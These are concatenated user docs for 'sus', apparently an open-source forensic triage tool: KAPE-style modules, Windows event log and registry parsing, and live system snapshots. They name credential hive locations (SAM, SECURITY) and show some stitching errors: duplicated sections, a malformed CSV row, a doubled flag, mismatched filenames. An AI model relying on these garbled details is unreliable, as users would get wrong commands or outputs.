Performance Considerations

Module Loading

Modules are loaded on-demand
Dependencies resolved recursively
Pattern compilation happens once
Deduplication prevents redundant patterns

Priority Levels

Modules with higher priority load first:

critical - Essential system artifacts
high - Important forensic data
medium - Standard artifacts
low - Supplementary data

Selective Loading

# Load only high-priority modules
sus /path --target KAPE_Triage --priority-threshold high

# Load platform-specific modules only
sus /path --target KAPE_Triage --platform windows

Compound targets & module system

Current State: Profile includes work but are static KAPE Feature: Dynamic compound targets that combine multiple modules Recommendation:

Enhance profile system with module references
Allow runtime target selection (e.g., "collect all browser artifacts")
Support for KAPE target format compatibility

KAPE target/module compatibility

Current State: Custom TOML format KAPE Feature: Standard target/module format Recommendation:

Import KAPE target definitions
Convert KAPE modules to sus profiles
Leverage existing KAPE community targets
Bidirectional conversion tools

Best Practices

Keep modules focused - One artifact type per module
Use descriptive names - Clear module and target names
Document patterns - Explain what each pattern matches
Test combinations - Verify modules work together
Set proper priorities - Critical artifacts first
Mark platform requirements - Specify supported platforms
Avoid circular dependencies - Keep dependency graph acyclic

Troubleshooting

Module Not Found

# Check module path
sus --show-module browser/chrome

# List all modules
sus --list-modules

Circular Dependencies

Error: Circular module dependency detected: browser/chrome -> common/sqlite -> browser/chrome

Solution: Refactor to break the cycle

Pattern Conflicts

Multiple modules may define similar patterns. Sus handles this by:

Pattern name uniqueness enforced
Duplicate patterns deduplicated
Last loaded takes precedence

Performance Issues

If loading is slow:

Reduce number of modules
Increase priority threshold
Disable unused modules
Use simpler patterns

Future Enhancements

KAPE .tkape file support - Direct loading of KAPE target files
Module versioning - Track module versions and compatibility
Module repository - Central repository for community modules
Dependency resolver - Automatic dependency management
Interactive TUI - Terminal UI for module selection
Module profiling - Performance analysis per module
Module marketplace - Share and discover modules

Migration from Static Profiles

Existing profiles continue to work. To use modules:

Option 1: Convert to Modules

Split large profiles into focused modules:

# Old: security-audit.toml with everything
# New: Multiple focused modules + target

Option 2: Reference Modules

Add module references to existing profiles:

# existing-profile.toml
includes = [
  "other-profile.toml"
]

# NEW: Add module references
modules = [
  "browser/chrome",
  "windows/execution"
]

[[patterns]]
  name = "Existing Pattern"
  pattern = "..."
  type = "regex"

Example Workflows

Incident Response Triage

# Quick triage
sus /compromised-system --target Quick_Triage --collect

# Comprehensive triage
sus /compromised-system --target KAPE_Triage --collect

# Browser-focused investigation
sus /user/profile --target KAPE_BrowserHistory --collect

Custom Forensic Collection

# Combine multiple targets
sus /evidence --target KAPE_EvidenceOfExecution \
              --target KAPE_BrowserHistory \
              --collect

# Selective module loading
sus /evidence --target KAPE_Triage \
              --enable-module browser/chrome \
              --enable-module windows/registry \
              --disable-module windows/event-logs

Platform-Specific Collection

# Windows artifacts only
sus /windows --target windows/* --collect

# Browser artifacts across platforms
sus /users --target browser/all-browsers --collect

Summary

The module and target system provides:

✅ Modular design - Reusable, focused components ✅ Runtime flexibility - Choose modules at execution time ✅ KAPE compatibility - Familiar naming and concepts ✅ Easy extensibility - Simple to add new modules ✅ Performance optimization - Load only what's needed ✅ Backward compatible - Existing profiles still work

This enhancement makes sus more powerful and flexible for forensic investigations while maintaining ease of use.

Windows Event Log (.evtx) Parsing

This document describes the Windows Event Log (.evtx) parsing feature in sus, which provides comprehensive parsing of Windows Event Logs with filtering capabilities and extraction of key forensic events.

Overview

The Event Log Parser enables forensic analysts to:

Parse Windows Event Log (.evtx) files
Filter events by Event ID, source, and level
Extract key security events (logon/logoff, account changes, etc.)
Generate event summary reports
Export parsed events to CSV or JSON format

This feature is inspired by KAPE's event log processing capabilities and integrates seamlessly with sus's forensic workflow including artifact collection, timeline generation, and system snapshots.

Features

Core Capabilities

Comprehensive Event Extraction: Parse all events from .evtx files
Flexible Filtering: Filter by Event ID, source, and severity level
Security Event Detection: Automatically identify forensically significant events
Multiple Output Formats: Export to CSV (timeline-friendly) or JSON (structured)
Summary Reports: Generate statistical summaries of parsed events
Cross-Platform: Works on Linux, macOS, and Windows for offline analysis

Extracted Event Fields

Each parsed event includes:

Timestamp (ISO 8601 format)
Event ID
Level (Critical, Error, Warning, Information, Verbose)
Source/Provider name
Computer name
User SID (if available)
Channel
Event data (structured XML/JSON)
Record ID
Process ID and Thread ID
Keywords, Task, and Opcode

Usage

Basic Event Log Parsing

# Parse all .evtx files found during analysis
sus /evidence --parse-evtx

# Forensic investigation with event log parsing
sus /evidence --target KAPE_Triage --parse-evtx --collect

Filtering Events

# Filter by specific Event IDs (logon events)
sus /evidence --parse-evtx --evtx-event-ids 4624,4625,4634

# Filter by event level
sus /evidence --parse-evtx --evtx-levels Critical,Error,Warning

# Filter by event source
sus /evidence --parse-evtx --evtx-sources Microsoft-Windows-Security-Auditing

# Combine filters
sus /evidence --parse-evtx \
    --evtx-event-ids 4624,4625,4648,4672 \
    --evtx-levels Warning,Error,Critical \
    --evtx-sources Microsoft-Windows-Security-Auditing

Output Formats

# Export to CSV format (default, timeline-friendly)
sus /evidence --parse-evtx --evtx-format csv --evtx-output events.csv

# Export to JSON format (structured with full metadata)
sus /evidence --parse-evtx --evtx-format json --evtx-output events.json

# Generate summary report
sus /evidence --parse-evtx --evtx-summary

# Custom output location
sus /evidence --parse-evtx --evtx-output /investigation/security_events.csv

Complete Forensic Workflow

# Full forensic analysis with all features
sus /evidence \
    --target KAPE_Triage \
    --system-snapshot \
    --collect \
    --parse-evtx --evtx-summary \
    --parse-registry \
    --generate-timeline json

# Multi-system event log collection
sus /servers \
    --tag-dir '/dc01:dc01' \
    --tag-dir '/web01:web01' \
    --parse-evtx \
    --evtx-event-ids 4624,4625,4648,4672,4720,4726,4740 \
    --evtx-summary \
    --generate-timeline csv

Command-Line Options

Event Log Parsing Flags

Flag	Description	Default
`--parse-evtx`	Enable Windows Event Log parsing	Disabled
`--evtx-event-ids <IDS>`	Filter by Event IDs (comma-separated)	All events
`--evtx-sources <SOURCES>`	Filter by event sources (comma-separated)	All sources
`--evtx-levels <LEVELS>`	Filter by levels (Critical,Error,Warning,Information,Verbose)	All levels
`--evtx-output <PATH>`	Custom output file path	`output_dir/evtx_events.{format}`
`--evtx-format <FORMAT>`	Output format (csv or json)	`csv`
`--evtx-summary`	Generate event summary report	Disabled

Output Formats

CSV Format

Timeline-friendly format with one row per event:

Timestamp,EventID,Level,Source,Computer,User,Channel,RecordID,ProcessID,ThreadID,EventData
2024-01-15T10:30:45.123Z,4624,Information,Microsoft-Windows-Security-Auditing,DC01,S-1-5-21-...,Security,12345,1234,5678,"{...}"
2024-01-15T10:31:12.456Z,4625,Warning,Microsoft-Windows-Security-Auditing,DC01,S-1-5-21-...,Security,12346,1234,5679,"{...}"

Fields:

Timestamp: Event creation time (ISO 8601)
EventID: Numeric event identifier
Level: Event severity level
Source: Event provider/source name
Computer: Computer name where event occurred
User: User SID (if available)
Channel: Event log channel (Security, System, Application, etc.)
RecordID: Unique event record identifier
ProcessID: Process ID that generated the event
ThreadID: Thread ID that generated the event
EventData: Event-specific data (JSON escaped for CSV)

JSON Format

Structured format with complete metadata:

[
  {
    "timestamp": "2024-01-15T10:30:45.123Z",
    "event_id": 4624,
    "level": "Information",
    "source": "Microsoft-Windows-Security-Auditing",
    "computer": "DC01",
    "user": "S-1-5-21-...",
    "channel": "Security",
    "event_data": {
      "SubjectUserSid": "S-1-5-18",
      "SubjectUserName": "DC01$",
      "TargetUserSid": "S-1-5-21-...",
      "TargetUserName": "Administrator",
      "LogonType": "2",
      "IpAddress": "192.168.1.100"
    },
    "message": null,
    "record_id": 12345,
    "process_id": 1234,
    "thread_id": 5678,
    "keywords": "0x8020000000000000",
    "task": "12544",
    "opcode": "0"
  }
]

Summary Report Format

When --evtx-summary is enabled, a JSON summary report is generated:

{
  "total_events": 15432,
  "event_id_counts": [
    [4624, 5421],
    [4634, 5419],
    [4672, 1234],
    [4688, 2145]
  ],
  "source_counts": [
    ["Microsoft-Windows-Security-Auditing", 14521],
    ["Microsoft-Windows-Kernel-General", 911]
  ],
  "level_counts": [
    ["Information", 14123],
    ["Warning", 891],
    ["Error", 418]
  ],
  "time_range": [
    "2024-01-15T00:00:00.000Z",
    "2024-01-15T23:59:59.999Z"
  ],
  "unique_computers": ["DC01", "WEB01", "DB01"],
  "unique_users": ["S-1-5-21-...", "S-1-5-21-..."]
}

Key Security Events

The parser automatically detects forensically significant security events:

Logon/Logoff Events

4624: Successful logon
4625: Failed logon attempt
4634: Logoff
4647: User-initiated logoff
4648: Explicit credential logon
4672: Special privileges assigned to new logon

Account Management

4720: User account created
4722: User account enabled
4723: Password change attempt
4724: Password reset attempt
4725: User account disabled
4726: User account deleted
4740: User account locked out

Group Management

4728: Member added to security-enabled global group
4732: Member added to security-enabled local group
4756: Member added to security-enabled universal group

Network Activity

4776: NTLM authentication attempt
4778: RDP session reconnected
4779: RDP session disconnected
5140: Network share accessed
5145: Network share access check

Forensic Analysis Workflows

1. Incident Response - Unauthorized Access Investigation

# Focus on authentication and account activity
sus /evidence --parse-evtx \
    --evtx-event-ids 4624,4625,4634,4648,4672,4720,4722,4726,4740 \
    --evtx-summary \
    --generate-timeline json

# Review the summary for anomalies:
# - High number of failed logons (4625) → Brute force attack?
# - Account creation (4720) at unusual times
# - Account lockouts (4740)
# - Special privilege assignments (4672)

2. Lateral Movement Detection

# Track RDP and network share access
sus /evidence --parse-evtx \
    --evtx-event-ids 4624,4648,4778,4779,5140,5145 \
    --evtx-format csv \
    --generate-timeline csv

# Analyze timeline for:
# - Logon type 10 (RDP) from unusual sources
# - Explicit credential usage (4648)
# - Network share access patterns
# - Session connections across multiple systems

3. Privilege Escalation Investigation

# Monitor privilege changes and group modifications
sus /evidence --parse-evtx \
    --evtx-event-ids 4672,4728,4732,4756 \
    --evtx-summary

# Look for:
# - Unexpected special privilege assignments (4672)
# - Additions to Domain Admins or local Administrators
# - Privilege escalation during incident timeframe

4. Security Audit

# Comprehensive security event analysis
sus /evidence \
    --parse-evtx \
    --evtx-sources Microsoft-Windows-Security-Auditing \
    --evtx-levels Warning,Error,Critical \
    --evtx-summary \
    --parse-registry \
    --generate-timeline json

# Review all security warnings and errors
# Cross-reference with registry artifacts and timeline

Integration with Other Features

With Artifact Collection

# Collect and parse event logs in one pass
sus /evidence --target KAPE_Triage --collect --parse-evtx

Collected .evtx files are:

Analyzed for patterns and suspicious content
Copied to output/collected/ with metadata preservation
Parsed for forensic artifacts
Included in the artifact manifest

With Timeline Generation

# Create unified timeline including event log timestamps
sus /evidence --parse-evtx --generate-timeline csv

Timeline includes:

File creation, modification, and access times
Event log event timestamps
System snapshot capture time
Artifact collection timestamps

With Registry Parser

# Correlate event logs with registry artifacts
sus /evidence --parse-evtx --parse-registry

Cross-reference:

Logon events (4624) with UserAssist execution evidence
Account creation (4720) with profile creation times
RDP connections (4778/4779) with network history
Application execution events with ShimCache/Amcache

With System Snapshot

# Capture live system state before event log analysis
sus /evidence --system-snapshot --parse-evtx

System snapshot provides context:

Running processes at analysis time
Active network connections
Logged-in users
System configuration

Platform Support

Windows

✅ Full support: Native parsing with all features
✅ Offline analysis: Parse .evtx files without running on Windows
✅ No admin required: Read-only access to event log files

Linux/macOS

✅ Full offline support: Parse Windows .evtx files on any platform
✅ Cross-platform forensics: Analyze Windows event logs from Linux/macOS
✅ DFIR workflows: Integrate with Linux-based forensic toolkits

File Detection

The parser automatically detects .evtx files during analysis:

Files with .evtx extension
Located in typical Windows event log directories:
- %SystemRoot%\System32\winevt\Logs\
- Windows\System32\winevt\Logs\
Custom locations specified by the analyst

Performance Considerations

...

Limitations

Message localization: Event messages are not localized (requires Windows message DLL parsing)
Custom event providers: Some third-party providers may have incomplete parsing
Corrupted logs: Damaged .evtx files may fail to parse completely
Binary event data: Some events contain binary data not fully decoded

Security Considerations

Privacy

Event logs may contain sensitive user information (usernames, SIDs, IP addresses)
Review and sanitize event data before sharing
Consider data protection regulations (GDPR, CCPA, etc.)

Chain of Custody

Event log parsing preserves original timestamps
SHA256 hashes of original .evtx files in artifact manifest
Export timestamps recorded for auditability

Legal and Ethical

Obtain proper authorization before analyzing event logs
Follow organizational policies and legal requirements
Document analysis procedures and findings
Maintain evidence integrity

Troubleshooting

No .evtx Files Found

No .evtx files found to parse

Solution: Ensure the scan path includes Windows event log directories or collected .evtx files.

Parser Errors

Failed to parse evtx file: ...

Causes:

Corrupted .evtx file
Unsupported event log format
Insufficient permissions

Solution: Check file integrity, verify format, ensure read access.

Empty Output

Event log parsing: 0 files, 0 events

Causes:

Filters too restrictive (Event IDs, levels, sources)
No matching events in logs

Solution: Relax filters or verify event log contents.

Best Practices

Start with summary: Use --evtx-summary to understand event distribution
Filter strategically: Use Event ID filters to focus on relevant events
Combine with timeline: Generate timeline for temporal correlation
Cross-reference: Correlate event logs with registry artifacts and file analysis
Document findings: Record analysis methodology and key observations
Preserve originals: Use --collect to preserve original .evtx files
Export both formats: CSV for timeline analysis, JSON for detailed review

Examples

Example 1: Quick Security Audit

sus /C/Windows/System32/winevt/Logs \
    --parse-evtx \
    --evtx-sources Microsoft-Windows-Security-Auditing \
    --evtx-summary

Example 2: Logon Investigation

sus /evidence \
    --parse-evtx \
    --evtx-event-ids 4624,4625,4634,4648 \
    --evtx-format csv \
    --evtx-output logon_events.csv \
    --generate-timeline csv

Example 3: Complete Forensic Analysis

sus /evidence \
    --target KAPE_Triage \
    --system-snapshot \
    --collect \
    --parse-evtx --evtx-summary \
    --parse-registry \
    --generate-timeline json \
    --output-dir /investigation/case-2024-01

Example 4: Failed Logon Analysis

sus /evidence \
    --parse-evtx \
    --evtx-event-ids 4625 \
    --evtx-levels Warning,Error \
    --evtx-format json \
    --evtx-output failed_logons.json

Future Enhancements

Planned features for future releases:

Event message localization using Windows message DLLs
Real-time event log monitoring mode
Advanced correlation with process execution artifacts
Automated anomaly detection in event patterns
Integration with threat intelligence feeds
Support for additional event log formats (XML, ETL)

References

Microsoft Event Log Documentation: https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging
Windows Security Log Encyclopedia: https://www.ultimatewindowssecurity.com/
KAPE Documentation: https://www.kroll.com/kape
SANS DFIR Resources: https://www.sans.org/digital-forensics-incident-response/

Windows Registry Parser for Forensic Analysis

Overview

The Windows Registry Parser extracts forensically significant artifacts from Windows Registry hive files. This feature provides comprehensive parsing of execution artifacts, user activity, system configuration, and network history that are essential for digital forensics and incident response.

Supported Artifacts

1. UserAssist (Program Execution Tracking)

Location: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count

Forensic Value:

Tracks program execution by users
Provides run counts and focus time
Shows last execution timestamps
Evidence of user application usage patterns

Extracted Data:

Program name (ROT13 decoded)
Run count
Focus count and focus time in milliseconds
Last execution timestamp
GUID (identifies the type of activity)

Example Entry:

{
  "program_name": "C:\\Program Files\\Application\\app.exe",
  "run_count": 15,
  "focus_count": 12,
  "focus_time_ms": 45230,
  "last_executed": "2024-01-15T14:30:22Z",
  "guid": "{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}"
}

2. ShimCache/AppCompatCache (Application Compatibility)

Location: SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache

Forensic Value:

Records executed binaries (both local and network locations)
Provides file modification timestamps
Shows evidence of program execution even if program was deleted
Tracks execution from removable media

Extracted Data:

Program path (full path to executable)
Last modified timestamp
File size
Execution flag (indicates if program actually ran)

Example Entry:

{
  "program_path": "C:\\Users\\Admin\\Downloads\\malware.exe",
  "last_modified": "2024-01-14T10:22:15Z",
  "file_size": 2048576,
  "executed": true
}

3. Amcache (Application Inventory)

Location: C:\\Windows\\appcompat\\Programs\\Amcache.hve

Forensic Value:

Detailed application installation and execution history
File hashes (SHA1) for attribution
Publisher information
Installation dates
File metadata (version, size)

Extracted Data:

Program name and path
SHA1 hash
Publisher name
Installation date
File size and version

Example Entry:

{
  "program_name": "suspicious_tool.exe",
  "program_path": "C:\\Temp\\suspicious_tool.exe",
  "sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
  "publisher": "Unknown Publisher",
  "install_date": "2024-01-10T08:15:00Z",
  "file_size": 1048576,
  "file_version": "1.0.0.0"
}

4. BAM/DAM (Background Activity Moderator)

Location:

BAM: SYSTEM\CurrentControlSet\Services\bam\State\UserSettings\{SID}
DAM: SYSTEM\CurrentControlSet\Services\dam\State\UserSettings\{SID}

Forensic Value:

Windows 10/11 execution tracking
Provides precise execution timestamps
Per-user execution tracking via SIDs
Background application activity monitoring

Extracted Data:

Program path
Execution timestamp
User SID (Security Identifier)
Entry type (BAM or DAM)

5. RecentDocs/OpenSaveMRU (Document Access History)

Location: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

Forensic Value:

Recently opened documents
File access patterns
Evidence of specific file interactions
MRU (Most Recently Used) tracking

Extracted Data:

Document name
File extension
MRU position (access order)
Last accessed timestamp

Example Entry:

{
  "document_name": "confidential_data.xlsx",
  "file_extension": ".xlsx",
  "mru_position": 1,
  "last_accessed": "2024-01-15T16:20:10Z"
}

Usage

Basic Usage

# Parse all registry files with all artifact types
sus /evidence --parse-registry

# Parse with custom output location
sus /evidence --parse-registry --registry-output investigation/registry_data.csv

Selective Artifact Parsing

# Parse only specific artifacts
sus /evidence --parse-registry --registry-artifacts userassist,shimcache,bam

# Parse execution-related artifacts
sus /evidence --parse-registry --registry-artifacts userassist,shimcache,amcache,bam \
    --registry-output execution_artifacts.csv

# Parse user activity artifacts
sus /evidence --parse-registry --parse-registry --registry-artifacts userassist,recentdocs,network,usb

Output Formats

CSV Format

Timeline-friendly format with one row per artifact entry:

artifact_type,timestamp,program_path,program_name,user_sid,details,key_path
UserAssist,2024-01-15T14:30:22Z,,notepad.exe,,"run_count=5 focus_count=3 focus_time_ms=12000",NTUSER.DAT\\...\\UserAssist\\{GUID}\\Count
ShimCache,2024-01-14T10:22:15Z,C:\\Tools\\tool.exe,,,"executed=true size=2048576",SYSTEM\\...\\AppCompatCache
BAM,2024-01-15T12:45:33Z,C:\\Windows\\System32\\cmd.exe,,S-1-5-21-...-1001,,SYSTEM\\...\\bam\\State\\UserSettings

JSON Format

Structured format with complete metadata:

{
  "userassist": [
    {
      "key_path": "...",
      "program_name": "...",
      "run_count": 15,
      "focus_count": 12,
      "focus_time_ms": 45230,
      "last_executed": "2024-01-15T14:30:22Z",
      "guid": "{...}",
      "raw_value_name": "..."
    }
  ],
  "shimcache": [...],
  "amcache": [...],
  "bam_dam": [...],
  "recentdocs": [...],
  "network_history": [...],
  "usb_devices": [...]
}

Registry Hive Files

Common Windows Registry Hive Locations

System-wide hives:

C:\\Windows\\System32\\config\\SYSTEM - System configuration, drivers, services
C:\\Windows\\System32\\config\\SOFTWARE - Installed applications, system-wide settings
C:\\Windows\\System32\\config\\SAM - User accounts and passwords (hashed)
C:\\Windows\\System32\\config\\SECURITY - Security policies
C:\\Windows\\appcompat\\Programs\\Amcache.hve - Application compatibility cache

Per-user hives:

C:\\Users\\{username}\\NTUSER.DAT - User-specific settings, UserAssist, RecentDocs
C:\\Users\\{username}\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat - User file associations

Transaction logs:

.LOG, .LOG1, .LOG2 files alongside hives contain uncommitted changes

Forensic Analysis Techniques

Timeline Analysis

# Generate comprehensive timeline with registry artifacts
sus /evidence --parse-registry --generate-timeline csv

# Then use timeline tools to correlate events
# Timeline will include registry timestamps alongside file system events

Execution Artifact Correlation

Look for the same executable across multiple sources:

UserAssist - User executed the program via Explorer
ShimCache - Windows compatibility check ran
Amcache - Installation or first execution metadata
BAM/DAM - Recent execution timestamp
Prefetch - Program execution optimization data

If a program appears in multiple sources, it provides strong evidence of execution.

User Activity Profiling

Combine artifacts to build user behavior profiles:

UserAssist - What programs they use most
RecentDocs - What documents they access
Network History - Where they connect from
USB Devices - What removable media they use

Malware Detection

Indicators of malicious activity:

Suspicious Execution Paths:
- Temp directories (C:\\Users\\{user}\\AppData\\Local\\Temp)
- Downloads folder
- Recycle Bin
- Non-standard system32 locations
Unusual Timestamps:
- Execution at odd hours
- Short execution times for complex programs
- Execution immediately after download
Missing Publisher Information:
- Unsigned executables in Amcache
- "Unknown Publisher" for system tools

Usage

Basic Usage

# Parse all registry files with all artifact types
sus /evidence --parse-registry

# Parse with custom output location
sus /evidence --parse-registry --registry-output investigation/registry_data.csv

Output Formats

# CSV format (default, timeline-friendly)
sus /evidence --parse-registry --registry-format csv

# JSON format (structured, all metadata)
sus /evidence --parse-registry --registry-format json --registry-output results.json

Combined with Other Features

# Full forensic workflow
sus /evidence --target KAPE_Triage \
    --system-snapshot \
    --collect \
    --parse-registry \
    --generate-timeline json

# Focused execution analysis
sus /evidence --target KAPE_EvidenceOfExecution \
    --parse-registry --registry-artifacts userassist,shimcache,amcache,bam \
    --registry-output execution_artifacts.csv

# Multi-system investigation
sus /servers --tag-dir '/web01:web01' --tag-dir '/db01:db01' \
    --parse-registry \
    --collect \
    --generate-timeline csv

artifact_type,timestamp,program_path,program_name,user_sid,details,key_path
UserAssist,2024-01-15T14:30:22Z,,notepad.exe,,"run_count=5 focus_count=3 focus_time_ms=12000",NTUSER.DAT\...\UserAssist\{GUID}\Count
ShimCache,2024-01-14T10:22:15Z,C:\Tools\tool.exe,,,,"executed=true size=2048576",SYSTEM\...\AppCompatCache
BAM,2024-01-15T12:45:33Z,C:\Windows\System32\cmd.exe,,S-1-5-21-...-1001,,SYSTEM\...\bam\State\UserSettings

C:\Windows\System32\config\SYSTEM - System configuration, drivers, services
C:\Windows\System32\config\SOFTWARE - Installed applications, system-wide settings
C:\Windows\System32\config\SAM - User accounts and passwords (hashed)
C:\Windows\System32\config\SECURITY - Security policies
C:\Windows\System32\config\DEFAULT - Default user profile
C:\Windows\appcompat\Programs\Amcache.hve - Application compatibility cache
C:\Users\{username}\NTUSER.DAT - User-specific settings, UserAssist, RecentDocs
C:\Users\{username}\AppData\Local\Microsoft\Windows\UsrClass.dat - User file associations
Temp directories (C:\Users\{user}\AppData\Local\Temp)
- Downloads folder
- Recycle Bin
- Non-standard system32 locations

Persistence Mechanisms:

Entries in startup locations
- Services registration
- Scheduled tasks

Data Exfiltration Detection

USB device analysis for potential data theft:

# Parse USB artifacts and correlate with file access times
sus /evidence --parse-registry --registry-artifacts usb,recentdocs \
    --registry-format csv

# Look for:
# 1. USB device connections
# 2. Document access around same time
# 3. Large file operations in timeline

Platform Support

Supported Platforms for Parsing

✅ Linux - Full support (can parse Windows registry hives)
✅ macOS - Full support (can parse Windows registry hives)
✅ Windows - Full support (native and offline parsing)

Parsing Capabilities

Offline Parsing: No Windows API required, works on any platform
Cross-platform: Parse Windows registry hives on Linux/macOS for forensics
No Admin Required: Read-only access to hive files
Transaction Log Support: Future enhancement to parse .LOG files

Limitations and Known Issues

Current Limitations

Binary Parsing:

Some timestamps require binary structure parsing (partially implemented)
- Focus time and run count parsing is basic
- Complex binary values may not be fully decoded

Transaction Logs:

.LOG files are not currently merged with hive data
- May miss uncommitted recent changes

Deleted Entries:

Does not recover deleted registry keys
- Registry slack space not analyzed

Windows Versions:

Parsing logic optimized for Windows 10/11
- Earlier versions (XP, Vista, 7, 8) mostly supported but may have differences

Future Enhancements

Enhanced Binary Parsing: Complete timestamp and counter extraction
Transaction Log Merging: Parse and merge .LOG files
Deleted Key Recovery: Carve deleted entries from slack space
Advanced Amcache Parsing: Parse additional Amcache structures
Registry Diff: Compare registry states over time
Automated Indicators: Flag suspicious patterns automatically

Security Considerations

Privacy

Registry hives contain sensitive information:

User passwords (hashed in SAM)
Recently accessed documents
Network locations
Personal identifying information

Recommendation: Treat registry artifacts as sensitive data. Secure storage and proper data handling are essential.

Evidence Integrity

For forensic investigations:

Hash Verification: Verify SHA256 of registry hives before and after parsing
Write Protection: Use write-blocked devices or read-only mounts
Chain of Custody: Document all access to registry files
Original Preservation: Work on copies, never original evidence

Legal Compliance

Registry parsing may be subject to:

Computer Fraud and Abuse Act (CFAA)
General Data Protection Regulation (GDPR)
Electronic Communications Privacy Act (ECPA)
Corporate data retention policies

Recommendation: Ensure proper authorization before parsing registry hives.

Integration with Other Tools

Timeline Tools

Export CSV format for use with:

Plaso/log2timeline - Combine with other timeline sources
Timesketch - Collaborative timeline analysis
Excel/LibreOffice - Manual review and pivot tables

SIEM Integration

Export JSON for ingestion into:

Splunk - Index and search artifacts
Elastic Stack - Visualize execution patterns
QRadar - Correlate with other security events

Forensic Suites

Combine with:

Autopsy - Comprehensive forensic analysis
AXIOM - Mobile and computer forensics
X-Ways Forensics - Disk analysis and carving

Examples

Basic Forensic Investigation

# Step 1: Acquire evidence
mount -o ro /dev/sdb1 /mnt/evidence

# Step 2: Run comprehensive analysis
sus /mnt/evidence/Windows \
    --target KAPE_Triage \
    --system-snapshot \
    --parse-registry \
    --collect \
    --generate-timeline json \
    --output-dir /cases/case-2024-001

# Output:
# - /cases/case-2024-001/analysis.db
# - /cases/case-2024-001/registry_artifacts.csv
# - /cases/case-2024-001/timeline.json
# - /cases/case-2024-001/system_snapshot.json
# - /cases/case-2024-001/collected/...

Malware Analysis

# Focus on execution artifacts
sus /suspect/system \
    --parse-registry \
    --registry-artifacts userassist,shimcache,amcache,bam \
    --registry-format json \
    --registry-output malware_execution.json

# Review execution_artifacts.json for:
# - Unusual program locations
# - Suspicious timestamps
# - Missing publisher info
# - Encoded/obfuscated names

User Activity Investigation

# Profile user behavior
sus /user/profile \
    --parse-registry \
    --registry-artifacts userassist,recentdocs,network,usb \
    --registry-format csv \
    --registry-output user_activity.csv

# Analyze user_activity.csv for:
# - Document access patterns
# - Program usage frequency
# - Network connections
# - USB device usage

Batch Processing

# Process multiple systems
for system in web01 web02 web03; do
    sus /evidence/${system}/Windows \
        --parse-registry \
        --registry-format json \
        --registry-output /results/${system}_registry.json \
        --tag-dir "/evidence/${system}:${system}"
done

# Combine results for correlation analysis

References

Windows Registry Forensics

SANS DFIR: Windows Registry Forensics
Harlan Carvey: "Windows Registry Forensics, 2nd Edition"
Microsoft Docs: Windows Registry reference
13Cubed (YouTube): Registry forensics videos

Tools and Libraries

notatin: Rust library for offline registry parsing
RegRipper: Perl-based registry analysis
Registry Explorer: Eric Zimmerman's tools
yarp: Python library for registry parsing

Standards

NIST SP 800-86: Guide to Integrating Forensic Techniques into Incident Response
ISO/IEC 27037: Guidelines for identification, collection, acquisition, and preservation of digital evidence

For issues, questions, or feature requests related to registry parsing:

GitHub Issues: https://github.com/hisn-io/sus/issues
Documentation: https://docs.rs/sus
Registry Artifacts Reference: See profiles/modules/windows/registry.toml and execution.toml

Changelog

Version 0.1.0

Initial implementation of registry parser
Support for UserAssist, ShimCache, Amcache, BAM/DAM, RecentDocs, Network History, USB Devices
CSV and JSON export formats
Cross-platform offline parsing
Integration with artifact collection and timeline generation

System Snapshot Collection

This document describes sus's system snapshot capabilities for capturing volatile system state at the start of forensic investigations and incident response.

Overview

The system snapshot feature captures a point-in-time snapshot of volatile system information at the beginning of analysis, before any file scanning begins. This includes running processes, active network connections, loaded kernel modules, open files, environment variables, and system information.

[!NOTE] This is different from the agent/controller "live response" feature which allows running arbitrary commands on remote agents (similar to Microsoft Defender for Endpoint or Elastic EDR live response). System snapshot is a passive data collection feature that captures system state automatically.

Distinction from Agent/Controller System Snapshot

System Snapshot (this feature):

Passive collection of system state
Runs automatically at analysis start
Captures predefined set of data (processes, connections, modules, etc.)
No command execution
Forensic/investigative focus

Agent/Controller System Snapshot (existing feature):

Interactive command execution on remote agents
On-demand, user-initiated
Flexible - run any command
MDE/Elastic EDR-style capabilities
Real-time incident response focus

Features

Collected Data

System Information
- Hostname and architecture
- Operating system name and version
- Kernel version
- System uptime
- Boot time
- CPU count and total memory
- Currently logged-in users
Running Processes
- Process ID (PID) and parent process ID (PPID)
- Process name and full command line
- Executable path
- User/owner (Unix/Linux)
- CPU percentage and memory usage (where available)
- Process start time
Network Connections
- Protocol (TCP/UDP)
- Local and remote addresses with ports
- Connection state (ESTABLISHED, LISTEN, TIME_WAIT, etc.)
- Associated process ID and name (where available)
Loaded Kernel Modules/Drivers
- Module name and size
- Dependencies (used by list)
- Module path (where available)
- Linux: From /proc/modules
- macOS: From kextstat
- Windows: From driverquery
Open Files and Handles
- Process ID and name
- File descriptor number
- File type (regular file, directory, socket, etc.)
- Full file path
- Unix/Linux/macOS: From lsof command
- Windows: Not currently supported (requires admin privileges)
Environment Variables
- Complete snapshot of environment variables
- Can reveal PATH configurations, temporary directories, user settings

Usage

Basic Collection

Collect live response data and save to default location:

sus /path --system-snapshot

This creates output/system_snapshot.json with all volatile system state.

Custom Output Location

Specify a custom path for the live response data:

sus /path --system-snapshot --system-snapshot-output /investigation/system_state.json

Forensic Investigation with System Snapshot

Combine live response with artifact collection for comprehensive investigation:

sus /evidence \
  --target KAPE_Triage \
  --collect \
  --system-snapshot \
  --generate-timeline json

This creates:

output/collected/ - Copied artifacts
output/system_snapshot.json - System state snapshot
output/timeline.json - Timeline of events
output/analysis.db - Analysis database

Multi-System Collection

Collect live response from multiple systems with tags:

# Web server
sus /mnt/web01 \
  --tag-dir '/mnt/web01:web01' \
  --system-snapshot \
  --system-snapshot-output /investigation/web01_live.json

# Database server
sus /mnt/db01 \
  --system-snapshot \
  --system-snapshot-output /investigation/db01_live.json

Output Format

System snapshot data is saved in JSON format with the following structure:

{
  "timestamp": "2024-01-15T10:30:00Z",
  "collection_host": "webserver01",
  "system_info": {
    "hostname": "webserver01",
    "os_name": "Ubuntu 22.04 LTS",
    "os_version": "22.04",
    "kernel_version": "5.15.0-91-generic",
    "architecture": "x86_64",
    "uptime_seconds": 1234567,
    "boot_time": "2024-01-01T00:00:00Z",
    "logged_in_users": ["admin", "service"],
    "cpu_count": 8,
    "total_memory_kb": 16777216
  },
  "processes": [
    {
      "pid": 1234,
